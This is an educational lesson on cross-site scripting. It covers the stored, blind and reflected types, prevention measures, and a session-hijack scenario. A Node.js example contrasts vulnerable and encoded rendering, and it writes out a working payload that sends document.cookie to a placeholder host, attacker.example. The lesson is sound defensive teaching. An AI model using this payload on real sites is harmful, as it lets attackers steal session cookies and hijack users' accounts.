# What you'll learn

After watching this video, you will be able to: 
* Describe cross-site scripting.
* Identify the types of cross-site scripting.
* Explain how to prevent cross-site scripting attacks.

# What is cross-site scripting?

Cross-site scripting is when an application takes untrusted data and then sends it to a web browser without proper validation or escaping.
* Attackers use cross-site scripting to execute scripts in the victim’s browser.
* You may see cross-site scripting represented as "XSS". 

![image.png](attachment:9f1add02-c6c0-476f-a954-306a840886af.png)

Cross-site scripting can be used to attack in different ways.
* For instance, cross-site scripting can enable attackers to hijack user sessions by stealing session cookies or tokens, or by issuing requests from inside the victim's authenticated page.
* A cross-site scripting attack can deface websites by replacing or removing images or content.
* Cross-site scripting can redirect users from a trusted website to a malicious website.

# Types of cross-site scripting

![image.png](attachment:d38ab842-101d-44d2-8931-e35e37707645.png)

Three common types of cross-site scripting attacks are **stored**, **blind**, and **reflected**. Blind cross-site scripting is usually treated as a variant of stored cross-site scripting.

A **stored cross-site scripting** attack injects a script that is saved on the targeted server, typically in a database field such as a comment, profile, or message.
	• Whenever a victim loads a page that includes that stored data, the browser runs the script in the victim's session, so the script can read or send whatever the victim is allowed to see.
	• Stored cross-site scripting is also referred to as persistent cross-site scripting.

Next, **blind cross-site scripting** injects a payload that executes later in a part of the application the attacker cannot see, such as an administrator's dashboard, a log viewer, or a support ticket queue, when a user or the administrator views the injected data without knowing it.
	• The attacker usually learns that the payload ran only when it calls back to a server the attacker controls.
	• Because it often runs with an administrator's privileges, the payload may compromise the application or the server.
	• It may even attack the user.

A **reflected cross-site scripting** attack places the script in the request itself, for example in a URL parameter or form field, and the attacked server echoes it back into the response without encoding it, so the script runs in the browser of the user who sent that request.

Delivering phishing email messages with malicious links that each carry such a payload, and so can compromise many victims, is an example of a reflected cross-site scripting attack.

# Preventing XSS attacks

![image.png](attachment:a0e1a65d-7ca8-4457-8dbb-bb3fb377b704.png)

You can protect your application against cross-site scripting attacks with these preventative measures.
* One measure is to inspect incoming HTTP requests for suspicious content and keywords that can trigger a scripting engine.
* Two examples are banned HTML tags and escape sequences. Treat this as a secondary layer only: blocklists of tags and keywords are routinely bypassed, so they never replace output encoding.
* Another preventative measure is to escape untrusted data for the context it is written into (HTML body, attribute value, JavaScript, or URL) and to block or encode special characters such as <, >, ", ' and &. Encode at output time, not only when input is received, because the same value may later be written into a different context.
* It's a good idea to turn off HTTP TRACE support on a web server. Cross-site tracing abuses TRACE to echo the request headers, including cookies, back to a script, which can then send them to a malicious server. Modern browsers refuse to send TRACE from scripts, but disabling it on the server costs nothing.
* Avoid unsafe sinks, which are functions or DOM properties on web pages that interpret a string as HTML or code, such as innerHTML, outerHTML, document.write, and eval.
* You should refactor code to remove references to unsafe sinks such as innerHTML or, better yet, use textContent or the value property, which treat the string as plain text.

# XSS hijack attack scenario

![image.png](attachment:b619fcd8-c0db-49fb-bb93-08b8ceb335e0.png)

Here’s an example of a cross-site scripting attack.
* This is a reflected attack in which the attacker is able to inject a script from another site into your site.
* The code here builds a variable called page with the plus-equal concatenation operator.
* It appends a string of HTML for an input field with a name of creditcard, a type of text, and a value that is, again, a call to the request's getParameter method for the "CC" parameter.
* The problem is that you are concatenating an untrusted string straight into the HTML without encoding it.
* Instead of providing a credit card number, an attacker can enter JavaScript!
* The attacker modifies the "CC" parameter so that it first closes the value attribute and the input tag, then opens a script tag.
* The script sets document.location to a URL on the attacker's site, a CGI-bin script, and appends document.cookie to it as a query parameter.
* This causes the victim's session ID to be sent to the attacker's website, which allows the attacker to hijack the user's current session.
* Marking the session cookie HttpOnly stops document.cookie from reading it, but it does not stop the injected script from acting as the user from inside the page, so encoding the output is still required.
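The scenario above, the stored and reflected flows from the types section, and the output-encoding measure from the prevention section, as one added example that is not part of the original lesson. The code is Node.js rather than the Java servlet the lesson describes; `attacker.example` and the `/cgi-bin/cookie.cgi` path are placeholders, `escapeHtml` is a hand-written encoder standing in for whatever your framework provides, and `containsInjectedScript` is only a test-time check on the rendered markup, not a detection control.

```javascript
// Added example, not code from the original lesson. Runs under Node.js with
// no dependencies. Hostnames and paths are placeholders.

// Contextual output encoding for HTML text and attribute values. Every
// character that could close an attribute or open a tag is replaced by its
// character reference, so the browser treats the value as data, never as
// markup. '&' is handled first so the other replacements are not re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: mirrors the lesson's example. The raw request parameter is
// concatenated straight into a single-quoted attribute value.
function renderCardFieldVulnerable(cc) {
  let page = "";
  page += "<input name='creditcard' type='text' value='" + cc + "'>";
  return page;
}

// Hardened: same markup, but the untrusted value is encoded for the attribute
// context first. Double quotes delimit the attribute; the encoder turns any
// quote in the input into a character reference, so nothing can close it.
function renderCardFieldSafe(cc) {
  let page = "";
  page += '<input name="creditcard" type="text" value="' + escapeHtml(cc) + '">';
  return page;
}

// Constructed attacker input for the "CC" parameter: closes the value
// attribute and the input tag, then injects a script that sends
// document.cookie (the session ID) to the attacker's CGI script.
const ATTACKER_HOST = "attacker.example"; // placeholder
const PAYLOAD =
  "'><script>document.location='http://" + ATTACKER_HOST +
  "/cgi-bin/cookie.cgi?foo='+document.cookie</script>";

// Test-time check only: does the rendered page contain a script element the
// template never wrote? A blocklist like this is bypassable and is not a
// substitute for encoding; it just makes the difference visible here.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Stored flow: the same kind of value was saved earlier (for example in a
// comments table) and is rendered to every later visitor. It goes through
// the same encoder as the reflected flow above.
function renderStoredComments(comments) {
  return "<ul>" +
    comments.map((c) => "<li>" + escapeHtml(c) + "</li>").join("") +
    "</ul>";
}

// Render the attacker's payload both ways and report what got through.
function demo() {
  const vulnerable = renderCardFieldVulnerable(PAYLOAD);
  const safe = renderCardFieldSafe(PAYLOAD);
  return {
    vulnerableInjected: containsInjectedScript(vulnerable), // true
    safeInjected: containsInjectedScript(safe),             // false
    vulnerableMarkup: vulnerable,
    safeMarkup: safe,
    storedMarkup: renderStoredComments(["Great site!", PAYLOAD]),
  };
}

console.log(demo());
```

Run it with `node` to see the two renderings side by side: in the vulnerable output the browser sees a closed input tag followed by a live script element, while in the hardened output the whole payload sits inside the value attribute as inert text. The browser-side analogue of `escapeHtml` is assigning to `textContent` or `value` instead of `innerHTML`; the encoder and the safe sink both make the browser treat the attacker's string as data.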

# Summary

In this video, you learned that:
* Cross-site scripting is when an application sends untrusted data to a browser without proper validation or escaping.
* Attackers use cross-site scripting to execute scripts in their victim’s browser.
* Three common cross-site scripting attacks are stored, blind, and reflected.
* And preventative measures include looking for suspicious HTTP requests, escaping untrusted output for its context, disabling HTTP TRACE, and avoiding unsafe sinks.